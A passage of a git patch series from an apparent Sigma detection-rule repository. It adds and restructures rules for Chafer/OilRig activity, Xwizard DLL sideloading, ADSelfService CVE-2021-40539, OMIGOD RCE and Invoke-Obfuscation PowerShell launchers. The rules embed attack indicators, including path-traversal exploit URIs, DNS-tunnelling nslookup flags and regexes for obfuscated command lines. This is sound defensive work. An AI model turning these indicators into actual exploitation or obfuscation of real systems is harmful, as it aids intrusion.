EventID: 4701 - TaskName: '\Microsoft\Windows\Defrag\ScheduledDefrag' + condition: selection +falsepositives: + - Unknown +level: medium \ No newline at end of file From d5108502a2b68ad2e5b691b530de7bc6ceb9d020 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 19 Sep 2021 11:48:20 +0200 Subject: [PATCH 0985/1367] split win_apt_chafer_mar18.yml --- .../builtin/win_apt_chafer_mar18_security.yml | 37 ++++++++++++++ .../builtin/win_apt_chafer_mar18_system.yml | 34 +++++++++++++ ...=> process_creationn_apt_chafer_mar18.yml} | 50 ++++--------------- .../registry_event_apt_chafer_mar18.yml | 36 +++++++++++++ 4 files changed, 116 insertions(+), 41 deletions(-) create mode 100644 rules/windows/builtin/win_apt_chafer_mar18_security.yml create mode 100644 rules/windows/builtin/win_apt_chafer_mar18_system.yml rename rules/windows/process_creation/{win_apt_chafer_mar18.yml => process_creationn_apt_chafer_mar18.yml} (62%) mode change 100755 => 100644 create mode 100644 rules/windows/registry_event/registry_event_apt_chafer_mar18.yml diff --git a/rules/windows/builtin/win_apt_chafer_mar18_security.yml b/rules/windows/builtin/win_apt_chafer_mar18_security.yml new file mode 100644 index 00000000..370db0c5 --- /dev/null +++ b/rules/windows/builtin/win_apt_chafer_mar18_security.yml @@ -0,0 +1,37 @@ +title: Chafer Activity +id: c0580559-a6bd-4ef6-b9b7-83703d98b561 +related: + - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 + type: derived +description: Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018 +references: + - https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/ +tags: + - attack.persistence + - attack.g0049 + - attack.t1053 # an old one + - attack.t1053.005 + - attack.s0111 + - attack.t1050 # an old one + - attack.t1543.003 + - attack.defense_evasion + - attack.t1112 + - attack.command_and_control + - attack.t1071 # an old one + - attack.t1071.004 +date: 2018/03/23 +modified: 2021/09/19 +author: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community +logsource: + product: windows + service: security +detection: + selection_service: + EventID: 4698 + TaskName: + - 'SC Scheduled Scan' + - 'UpdatMachine' + condition: selection_service +falsepositives: + - Unknown +level: critical \ No newline at end of file diff --git a/rules/windows/builtin/win_apt_chafer_mar18_system.yml b/rules/windows/builtin/win_apt_chafer_mar18_system.yml new file mode 100644 index 00000000..c17e00d0 --- /dev/null +++ b/rules/windows/builtin/win_apt_chafer_mar18_system.yml @@ -0,0 +1,34 @@ +title: Chafer Activity +id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 +description: Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018 +references: + - https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/ +tags: + - attack.persistence + - attack.g0049 + - attack.t1053 # an old one + - attack.t1053.005 + - attack.s0111 + - attack.t1050 # an old one + - attack.t1543.003 + - attack.defense_evasion + - attack.t1112 + - attack.command_and_control + - attack.t1071 # an old one + - attack.t1071.004 +date: 2018/03/23 +modified: 2021/09/19 +author: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community +logsource: + product: windows + service: system +detection: + selection_service: + EventID: 7045 + ServiceName: + - 'SC Scheduled Scan' + - 'UpdatMachine' + condition: selection_service +falsepositives: + - Unknown +level: critical \ No newline at end of file diff --git a/rules/windows/process_creation/win_apt_chafer_mar18.yml b/rules/windows/process_creation/process_creationn_apt_chafer_mar18.yml old mode 100755 new mode 100644 similarity index 62% rename from rules/windows/process_creation/win_apt_chafer_mar18.yml rename to rules/windows/process_creation/process_creationn_apt_chafer_mar18.yml index ad32e036..39d28e4a --- a/rules/windows/process_creation/win_apt_chafer_mar18.yml +++ b/rules/windows/process_creation/process_creationn_apt_chafer_mar18.yml @@ -1,5 +1,8 @@ -action: global title: Chafer Activity +id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06 +related: + - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 + type: derived description: Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018 references: - https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/ @@ -17,47 +20,8 @@ tags: - attack.t1071 # an old one - attack.t1071.004 date: 2018/03/23 -modified: 2020/08/26 +modified: 2021/09/19 author: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community -detection: - condition: 1 of them -falsepositives: - - Unknown -level: critical ---- -id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 -logsource: - product: windows - service: system -detection: - selection_service: - EventID: 7045 - ServiceName: - - 'SC Scheduled Scan' - - 'UpdatMachine' ---- -id: c0580559-a6bd-4ef6-b9b7-83703d98b561 -logsource: - product: windows - service: security -detection: - selection_service: - EventID: 4698 - TaskName: - - 'SC Scheduled Scan' - - 'UpdatMachine' ---- -id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 -logsource: - category: registry_event - product: windows -detection: - selection_reg1: - TargetObject|endswith: - - 'SOFTWARE\Microsoft\Windows\CurrentVersion\UMe' - - 'SOFTWARE\Microsoft\Windows\CurrentVersion\UT' ---- -id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06 logsource: category: process_creation product: windows @@ -78,3 +42,7 @@ detection: - '\nslookup.exe' - '-q=TXT' ParentImage|contains: '\Autoit' + condition: 1 of them +falsepositives: + - Unknown +level: critical diff --git a/rules/windows/registry_event/registry_event_apt_chafer_mar18.yml b/rules/windows/registry_event/registry_event_apt_chafer_mar18.yml new file mode 100644 index 00000000..a1ee3e87 --- /dev/null +++ b/rules/windows/registry_event/registry_event_apt_chafer_mar18.yml @@ -0,0 +1,36 @@ +title: Chafer Activity +id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 +related: + - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 + type: derived +description: Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018 +references: + - https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/ +tags: + - attack.persistence + - attack.g0049 + - attack.t1053 # an old one + - attack.t1053.005 + - attack.s0111 + - attack.t1050 # an old one + - attack.t1543.003 + - attack.defense_evasion + - attack.t1112 + - attack.command_and_control + - attack.t1071 # an old one + - attack.t1071.004 +date: 2018/03/23 +modified: 2021/09/19 +author: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community +logsource: + category: registry_event + product: windows +detection: + selection_reg1: + TargetObject|endswith: + - 'SOFTWARE\Microsoft\Windows\CurrentVersion\UMe' + - 'SOFTWARE\Microsoft\Windows\CurrentVersion\UT' + condition: selection_reg1 +falsepositives: + - Unknown +level: critical \ No newline at end of file From 6286cf80cc9586ca6bfe45712e5e6b0ce5e93963 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 20 Sep 2021 09:31:04 +0200 Subject: [PATCH 0986/1367] fix duplicate name file --- ...mon_uac_bypass_winsat.yml => file_event_uac_bypass_winsat.yml} | 0 .../{sysmon_uac_bypass_wmp.yml => file_event_uac_bypass_wmp.yml} | 0 ...uac_bypass_winsat.yml => registry_event_uac_bypass_winsat.yml} | 0 ...ysmon_uac_bypass_wmp.yml => registry_event_uac_bypass_wmp.yml} | 0 4 files changed, 0 insertions(+), 0 deletions(-) rename rules/windows/file_event/{sysmon_uac_bypass_winsat.yml => file_event_uac_bypass_winsat.yml} (100%) rename rules/windows/file_event/{sysmon_uac_bypass_wmp.yml => file_event_uac_bypass_wmp.yml} (100%) rename rules/windows/registry_event/{sysmon_uac_bypass_winsat.yml => registry_event_uac_bypass_winsat.yml} (100%) rename rules/windows/registry_event/{sysmon_uac_bypass_wmp.yml => registry_event_uac_bypass_wmp.yml} (100%) diff --git a/rules/windows/file_event/sysmon_uac_bypass_winsat.yml b/rules/windows/file_event/file_event_uac_bypass_winsat.yml similarity index 100% rename from rules/windows/file_event/sysmon_uac_bypass_winsat.yml rename to rules/windows/file_event/file_event_uac_bypass_winsat.yml diff --git a/rules/windows/file_event/sysmon_uac_bypass_wmp.yml b/rules/windows/file_event/file_event_uac_bypass_wmp.yml similarity index 100% rename from rules/windows/file_event/sysmon_uac_bypass_wmp.yml rename to rules/windows/file_event/file_event_uac_bypass_wmp.yml diff --git a/rules/windows/registry_event/sysmon_uac_bypass_winsat.yml b/rules/windows/registry_event/registry_event_uac_bypass_winsat.yml similarity index 100% rename from rules/windows/registry_event/sysmon_uac_bypass_winsat.yml rename to rules/windows/registry_event/registry_event_uac_bypass_winsat.yml diff --git a/rules/windows/registry_event/sysmon_uac_bypass_wmp.yml b/rules/windows/registry_event/registry_event_uac_bypass_wmp.yml similarity index 100% rename from rules/windows/registry_event/sysmon_uac_bypass_wmp.yml rename to rules/windows/registry_event/registry_event_uac_bypass_wmp.yml From 4e794fe3e7127108ce00c07a7cac75c3cac74102 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Mon, 20 Sep 2021 10:37:24 +0200 Subject: [PATCH 0987/1367] xwizard dll sideloading --- .../win_dll_sideload_xwizard.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/windows/process_creation/win_dll_sideload_xwizard.yml diff --git a/rules/windows/process_creation/win_dll_sideload_xwizard.yml b/rules/windows/process_creation/win_dll_sideload_xwizard.yml new file mode 100644 index 00000000..0f03e6f9 --- /dev/null +++ b/rules/windows/process_creation/win_dll_sideload_xwizard.yml @@ -0,0 +1,24 @@ +title: Xwizard DLL Sideloading +id: 193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1 +status: experimental +description: Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll +references: + - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/ + - http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/ +author: Christian Burkard +date: 2021/09/20 +tags: + - attack.defense_evasion + - attack.t1574.002 +logsource: + category: process_creation + product: windows +detection: + selection: + Image|endswith: '\xwizard.exe' + filter: + Image|startswith: '?:\Windows\System32\' + condition: selection and not filter +falsepositives: + - Unlikely +level: high From 6c630502dcf8cd3cc190d11065f7ab13c3384a65 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 20 Sep 2021 10:54:53 +0200 Subject: [PATCH 0988/1367] Update win_dll_sideload_xwizard.yml --- rules/windows/process_creation/win_dll_sideload_xwizard.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_dll_sideload_xwizard.yml b/rules/windows/process_creation/win_dll_sideload_xwizard.yml index 0f03e6f9..0efad466 100644 --- a/rules/windows/process_creation/win_dll_sideload_xwizard.yml +++ b/rules/windows/process_creation/win_dll_sideload_xwizard.yml @@ -17,7 +17,7 @@ detection: selection: Image|endswith: '\xwizard.exe' filter: - Image|startswith: '?:\Windows\System32\' + Image|startswith: 'C:\Windows\System32\' condition: selection and not filter falsepositives: - Unlikely From 25a407e24f594e343dfcc25f209731540c7724c9 Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Mon, 20 Sep 2021 10:56:37 +0200 Subject: [PATCH 0989/1367] Update win_dll_sideload_xwizard.yml --- rules/windows/process_creation/win_dll_sideload_xwizard.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_dll_sideload_xwizard.yml b/rules/windows/process_creation/win_dll_sideload_xwizard.yml index 0efad466..a9102fa1 100644 --- a/rules/windows/process_creation/win_dll_sideload_xwizard.yml +++ b/rules/windows/process_creation/win_dll_sideload_xwizard.yml @@ -20,5 +20,5 @@ detection: Image|startswith: 'C:\Windows\System32\' condition: selection and not filter falsepositives: - - Unlikely + - Windows installed on non-C drive level: high From 79d2144424f6da8f0781b4ec1e2c0c88973c9fc2 Mon Sep 17 00:00:00 2001 From: Tobias Michalski Date: Mon, 20 Sep 2021 12:26:46 +0200 Subject: [PATCH 0990/1367] feat: Rule for ADSelfService cve_2021_40539 --- .../web/web_cve_2021_40539_adselfservice.yml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 rules/web/web_cve_2021_40539_adselfservice.yml diff --git a/rules/web/web_cve_2021_40539_adselfservice.yml b/rules/web/web_cve_2021_40539_adselfservice.yml new file mode 100644 index 00000000..4a89ae31 --- /dev/null +++ b/rules/web/web_cve_2021_40539_adselfservice.yml @@ -0,0 +1,19 @@ +title: Detects ADSelfService exploitation +id: 6702b13c-e421-44cc-ab33-42cc25570f11 +status: experimental +description: Detects various logs that occur on explatiation of ADSelfService cve_2021_40539 +author: Tobias Michalski, Max Altgelt +date: 2021/09/20 +logsource: + category: logfile +detection: + keywords: + - '/help/admin-guide/Reports/ReportGenerate.jsp' + - '/ServletApi/../RestApi/LogonCustomization' + - '/ServletApi/../RestAPI/Connection' + - 'Keystore will be created for "admin"' + - 'The status of keystore creation is Upload!' + condition: keywords +falsepositives: + - Unknown, Maybe initial installation of ADSelfService +level: low From 2b843e58ee0d1b8febbb8ae8aa24a1f0477a8134 Mon Sep 17 00:00:00 2001 From: Tobias Michalski Date: Mon, 20 Sep 2021 12:28:47 +0200 Subject: [PATCH 0991/1367] fix: added references --- .../web/web_cve_2021_40539_adselfservice.yml | 20 ++++++++++--------- 1 file changed, 11 insertions(+), 9 deletions(-) diff --git a/rules/web/web_cve_2021_40539_adselfservice.yml b/rules/web/web_cve_2021_40539_adselfservice.yml index 4a89ae31..ed480f16 100644 --- a/rules/web/web_cve_2021_40539_adselfservice.yml +++ b/rules/web/web_cve_2021_40539_adselfservice.yml @@ -3,17 +3,19 @@ id: 6702b13c-e421-44cc-ab33-42cc25570f11 status: experimental description: Detects various logs that occur on explatiation of ADSelfService cve_2021_40539 author: Tobias Michalski, Max Altgelt +references: + - https://us-cert.cisa.gov/ncas/alerts/aa21-259a date: 2021/09/20 logsource: - category: logfile + category: logfile detection: - keywords: - - '/help/admin-guide/Reports/ReportGenerate.jsp' - - '/ServletApi/../RestApi/LogonCustomization' - - '/ServletApi/../RestAPI/Connection' - - 'Keystore will be created for "admin"' - - 'The status of keystore creation is Upload!' - condition: keywords + keywords: + - '/help/admin-guide/Reports/ReportGenerate.jsp' + - '/ServletApi/../RestApi/LogonCustomization' + - '/ServletApi/../RestAPI/Connection' + - 'Keystore will be created for "admin"' + - 'The status of keystore creation is Upload!' + condition: keywords falsepositives: - - Unknown, Maybe initial installation of ADSelfService + - Unknown, Maybe initial installation of ADSelfService level: low From 56069a21960a297ba757a67c6301de1dc700da5b Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 20 Sep 2021 13:07:31 +0200 Subject: [PATCH 0992/1367] Update web_cve_2021_40539_adselfservice.yml --- .../web/web_cve_2021_40539_adselfservice.yml | 21 +++++++++---------- 1 file changed, 10 insertions(+), 11 deletions(-) diff --git a/rules/web/web_cve_2021_40539_adselfservice.yml b/rules/web/web_cve_2021_40539_adselfservice.yml index ed480f16..70bd3447 100644 --- a/rules/web/web_cve_2021_40539_adselfservice.yml +++ b/rules/web/web_cve_2021_40539_adselfservice.yml @@ -1,21 +1,20 @@ title: Detects ADSelfService exploitation id: 6702b13c-e421-44cc-ab33-42cc25570f11 status: experimental -description: Detects various logs that occur on explatiation of ADSelfService cve_2021_40539 +description: Detects suspicious access to URLs that was noticed in cases in which attackers exploitated the ADSelfService vulnerability CVE-2021-40539 author: Tobias Michalski, Max Altgelt references: - https://us-cert.cisa.gov/ncas/alerts/aa21-259a date: 2021/09/20 logsource: - category: logfile + category: webserver detection: - keywords: - - '/help/admin-guide/Reports/ReportGenerate.jsp' - - '/ServletApi/../RestApi/LogonCustomization' - - '/ServletApi/../RestAPI/Connection' - - 'Keystore will be created for "admin"' - - 'The status of keystore creation is Upload!' - condition: keywords + selection: + c-uri|contains: + - '/help/admin-guide/Reports/ReportGenerate.jsp' + - '/ServletApi/../RestApi/LogonCustomization' + - '/ServletApi/../RestAPI/Connection' + condition: selection falsepositives: - - Unknown, Maybe initial installation of ADSelfService -level: low + - Unknown +level: high From 4424bc9c5da6b753b7d45d9c0216d85b75bcd78b Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 20 Sep 2021 13:20:39 +0200 Subject: [PATCH 0993/1367] Update web_cve_2021_40539_adselfservice.yml --- rules/web/web_cve_2021_40539_adselfservice.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/web/web_cve_2021_40539_adselfservice.yml b/rules/web/web_cve_2021_40539_adselfservice.yml index 70bd3447..0c2d2d00 100644 --- a/rules/web/web_cve_2021_40539_adselfservice.yml +++ b/rules/web/web_cve_2021_40539_adselfservice.yml @@ -1,4 +1,4 @@ -title: Detects ADSelfService exploitation +title: Detects ADSelfService Exploitation id: 6702b13c-e421-44cc-ab33-42cc25570f11 status: experimental description: Detects suspicious access to URLs that was noticed in cases in which attackers exploitated the ADSelfService vulnerability CVE-2021-40539 From 6dbc369eb5df4ae74f7812131ba48ac954104157 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 20 Sep 2021 15:51:21 +0200 Subject: [PATCH 0994/1367] Update web_cve_2021_40539_adselfservice.yml --- rules/web/web_cve_2021_40539_adselfservice.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/web/web_cve_2021_40539_adselfservice.yml b/rules/web/web_cve_2021_40539_adselfservice.yml index 0c2d2d00..b6469958 100644 --- a/rules/web/web_cve_2021_40539_adselfservice.yml +++ b/rules/web/web_cve_2021_40539_adselfservice.yml @@ -1,4 +1,4 @@ -title: Detects ADSelfService Exploitation +title: ADSelfService Exploitation id: 6702b13c-e421-44cc-ab33-42cc25570f11 status: experimental description: Detects suspicious access to URLs that was noticed in cases in which attackers exploitated the ADSelfService vulnerability CVE-2021-40539 From 61c9c9fb20ed946f2d626fbc257a063b2748665a Mon Sep 17 00:00:00 2001 From: neu5ron Date: Mon, 20 Sep 2021 12:26:01 -0400 Subject: [PATCH 0995/1367] Zeek detection for OMIGOD HTTP RCE Signed-off-by: neu5ron --- .../zeek/zeek_http_omigod_no_auth_rce.yml | 54 +++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 rules/network/zeek/zeek_http_omigod_no_auth_rce.yml diff --git a/rules/network/zeek/zeek_http_omigod_no_auth_rce.yml b/rules/network/zeek/zeek_http_omigod_no_auth_rce.yml new file mode 100644 index 00000000..4e1f31ed --- /dev/null +++ b/rules/network/zeek/zeek_http_omigod_no_auth_rce.yml @@ -0,0 +1,54 @@ +title: OMIGOD HTTP No Authentication RCE +id: ab6b1a39-a9ee-4ab4-b075-e83acf6e346b +description: Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request. Verify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP). Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request. +author: Nate Guagenti (neu5ron) +date: 2021/09/20 +modified: 2019/09/20 +references: + - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure + - https://twitter.com/neu5ron/status/1438987292971053057?s=20 +tags: + - attack.privilege_escalation + - attack.initial_access + - attack.execution + - attack.lateral_movement + - attack.t1068 + - attack.t1190 + - attack.t1203 + - attack.t1021.006 + - attack.t1210 +logsource: + product: zeek + service: http + definition: Enable the builtin Zeek script that logs all HTTP header names by adding "@load policy/protocols/http/header-names" to your local.zeek config file. The script can be seen here for reference https://github.com/zeek/zeek/blob/master/scripts/policy/protocols/http/header-names.zeek +detection: + selection: + status_code: 200 + uri: /wsman + method: POST + auth_header: + client_header_names|contains: "AUTHORIZATION" + too_small_http_client_body: + request_body_len: 0 + #winrm_ports: + # id.resp_p: + # - 5985 + # - 5986 + # - 1270 + condition: selection and not auth_header and not too_small_http_client_body + #condition: selection and winrm_ports and not auth_header and not too_small_http_client_body # Enable this to only perform search on default WinRM ports, however those ports are sometimes changed and therefore this is disabled by default to give a broader coverage of this rule +falsepositives: + - Exploits that were attempted but unsuccessful. + - Scanning attempts with the abnormal use of the HTTP POST method with no indication of code execution within the HTTP Client (Request) body. An example would be vulnerability scanners trying to identify unpatched versions while not actually exploiting the vulnerability. See description for investigation tips. +level: high +fields: + - id.orig_h + - id.resp_h + - id.resp_p + - status_code + - method + - uri + - request_body_len + - response_body_len + - user_agent +status: stable From feee70644ff174b17b2135d5a233c48bfafe33cf Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 20 Sep 2021 22:40:33 +0200 Subject: [PATCH 0996/1367] split global win_invoke_obfuscation_* --- .../win_invoke_obfuscation_clip+_services.yml | 35 ++++------------- ...ke_obfuscation_obfuscated_iex_services.yml | 38 +++++-------------- ...win_invoke_obfuscation_stdin+_services.yml | 35 ++++------------- .../win_invoke_obfuscation_var+_services.yml | 32 ++++------------ ...voke_obfuscation_via_compress_services.yml | 27 ++----------- ...invoke_obfuscation_via_rundll_services.yml | 35 ++++------------- ..._invoke_obfuscation_via_stdin_services.yml | 35 ++++------------- ...voke_obfuscation_via_use_clip_services.yml | 35 ++++------------- ...oke_obfuscation_via_use_mshta_services.yml | 35 ++++------------- ..._obfuscation_via_use_rundll32_services.yml | 35 ++++------------- ..._invoke_obfuscation_via_var++_services.yml | 35 ++++------------- 11 files changed, 86 insertions(+), 291 deletions(-) diff --git a/rules/windows/builtin/win_invoke_obfuscation_clip+_services.yml b/rules/windows/builtin/win_invoke_obfuscation_clip+_services.yml index 6ba0e08f..c71bb902 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_clip+_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_clip+_services.yml @@ -1,10 +1,10 @@ -action: global title: Invoke-Obfuscation CLIP+ Launcher +id: f7385ee2-0e0c-11eb-adc1-0242ac120002 description: Detects Obfuscated use of Clip.exe to execute PowerShell status: experimental author: Jonathan Cheong, oscd.community date: 2020/10/13 -modified: 2021/08/14 +modified: 2021/09/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 26) tags: @@ -12,34 +12,15 @@ tags: - attack.t1027 - attack.execution - attack.t1059.001 -falsepositives: - - Unknown -level: high -detection: - selection: - ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\\"\{\d\}.+\-f.+\"' - condition: selection and selection_eventid ---- -id: f7385ee2-0e0c-11eb-adc1-0242ac120002 logsource: product: windows service: system detection: selection_eventid: EventID: 7045 ---- -id: 21e4b3c1-4985-4aa4-a6c0-f8639590a5f3 -logsource: - product: windows - category: driver_load -detection: - selection_eventid: - EventID: 6 ---- -id: 4edf51e1-cb83-4e1a-bc39-800e396068e3 -logsource: - product: windows - service: security -detection: - selection_eventid: - EventID: 4697 + selection: + ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\\"\{\d\}.+\-f.+\"' + condition: selection and selection_eventid +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services.yml b/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services.yml index 077f3e5c..4a0dbf7e 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services.yml @@ -1,16 +1,19 @@ -action: global title: Invoke-Obfuscation Obfuscated IEX Invocation +id: 51aa9387-1c53-4153-91cc-d73c59ae1ca9 description: "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014 https://github.com/danielbohannon/Invoke-Obfuscation/blob/master/Out-ObfuscatedStringCommand.ps1#L873-L888" status: experimental author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community date: 2019/11/08 +modified: 2021/09/16 tags: - attack.defense_evasion - attack.t1027 -falsepositives: - - Unknown -level: high +logsource: + product: windows + service: system detection: + selection: + EventID: 7045 selection_1: - ImagePath|re: '\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[' - ImagePath|re: '\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[' @@ -20,27 +23,6 @@ detection: - ImagePath|re: '\$VerbosePreference\.ToString\(' - ImagePath|re: '\String\]\s*\$VerbosePreference' condition: selection and selection_1 ---- -id: 51aa9387-1c53-4153-91cc-d73c59ae1ca9 -logsource: - product: windows - service: system -detection: - selection: - EventID: 7045 ---- -id: e75c48bd-3434-4d61-94b7-ddfaa2c08487 -logsource: - product: windows - category: driver_load -detection: - selection: - EventID: 6 ---- -id: fd0f5778-d3cb-4c9a-9695-66759d04702a -logsource: - product: windows - service: security -detection: - selection: - EventID: 4697 +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/builtin/win_invoke_obfuscation_stdin+_services.yml b/rules/windows/builtin/win_invoke_obfuscation_stdin+_services.yml index 0bebb79d..1df94234 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_stdin+_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_stdin+_services.yml @@ -1,10 +1,10 @@ -action: global title: Invoke-Obfuscation STDIN+ Launcher +id: 72862bf2-0eb1-11eb-adc1-0242ac120002 description: Detects Obfuscated use of stdin to execute PowerShell status: experimental author: Jonathan Cheong, oscd.community date: 2020/10/15 -modified: 2021/08/09 +modified: 2021/09/17 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 25) tags: @@ -12,34 +12,15 @@ tags: - attack.t1027 - attack.execution - attack.t1059.001 -falsepositives: - - Unknown -level: high -detection: - selection: - ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r).+powershell.+(?:\$\{?input\}?|noexit).+\"' - condition: selection and selection_eventid ---- -id: 72862bf2-0eb1-11eb-adc1-0242ac120002 logsource: product: windows service: system detection: selection_eventid: EventID: 7045 ---- -id: de7fb680-6efa-4bf3-af2c-14b6d33c8e6e -logsource: - product: windows - category: driver_load -detection: - selection_eventid: - EventID: 6 ---- -id: 0c718a5e-4284-4fb9-b4d9-b9a50b3a1974 -logsource: - product: windows - service: security -detection: - selection_eventid: - EventID: 4697 + selection: + ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r).+powershell.+(?:\$\{?input\}?|noexit).+\"' + condition: selection and selection_eventid +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/builtin/win_invoke_obfuscation_var+_services.yml b/rules/windows/builtin/win_invoke_obfuscation_var+_services.yml index 939ff725..c94706f0 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_var+_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_var+_services.yml @@ -1,10 +1,10 @@ -action: global title: Invoke-Obfuscation VAR+ Launcher +id: 8ca7004b-e620-4ecb-870e-86129b5b8e75 description: Detects Obfuscated use of Environment Variables to execute PowerShell status: experimental author: Jonathan Cheong, oscd.community date: 2020/10/15 -modified: 2021/08/09 +modified: 2021/09/17 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 24) tags: @@ -12,31 +12,15 @@ tags: - attack.t1027 - attack.execution - attack.t1059.001 -falsepositives: - - Unknown -level: high -detection: - selection: - ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"' - condition: all of them ---- -id: 8ca7004b-e620-4ecb-870e-86129b5b8e75 logsource: product: windows service: system detection: selection_eventid: EventID: 7045 ---- -id: 3e27b010-2cf2-4577-8ef0-3ea44aaea0dc -logsource: - product: windows - category: process_creation ---- -id: dcf2db1f-f091-425b-a821-c05875b8925a -logsource: - product: windows - service: security -detection: - selection_eventid: - EventID: 4697 + selection: + ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"' + condition: all of them +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_compress_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_compress_services.yml index 1b1b490f..04f8fbb6 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_compress_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_compress_services.yml @@ -1,5 +1,5 @@ -action: global title: Invoke-Obfuscation COMPRESS OBFUSCATION +id: 175997c5-803c-4b08-8bb0-70b099f47595 description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION status: experimental author: Timur Zinniatullin, oscd.community @@ -15,31 +15,12 @@ tags: falsepositives: - unknown level: medium -detection: - selection: - ImagePath|re: '(?i).*new-object.*(?:system\.io\.compression\.deflatestream|system\.io\.streamreader).*text\.encoding\]::ascii.*readtoend' - condition: selection and selection_eventid ---- -id: 175997c5-803c-4b08-8bb0-70b099f47595 logsource: product: windows service: system detection: selection_eventid: EventID: 7045 ---- -id: c70731dd-0097-40ff-b112-f7032f29c16c -logsource: - product: windows - category: driver_load -detection: - selection_eventid: - EventID: 6 ---- -id: 7a922f1b-2635-4d6c-91ef-af228b198ad3 -logsource: - product: windows - service: security -detection: - selection_eventid: - EventID: 4697 + selection: + ImagePath|re: '(?i).*new-object.*(?:system\.io\.compression\.deflatestream|system\.io\.streamreader).*text\.encoding\]::ascii.*readtoend' + condition: selection and selection_eventid \ No newline at end of file diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services.yml index 11317dda..2855fa00 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services.yml +++ 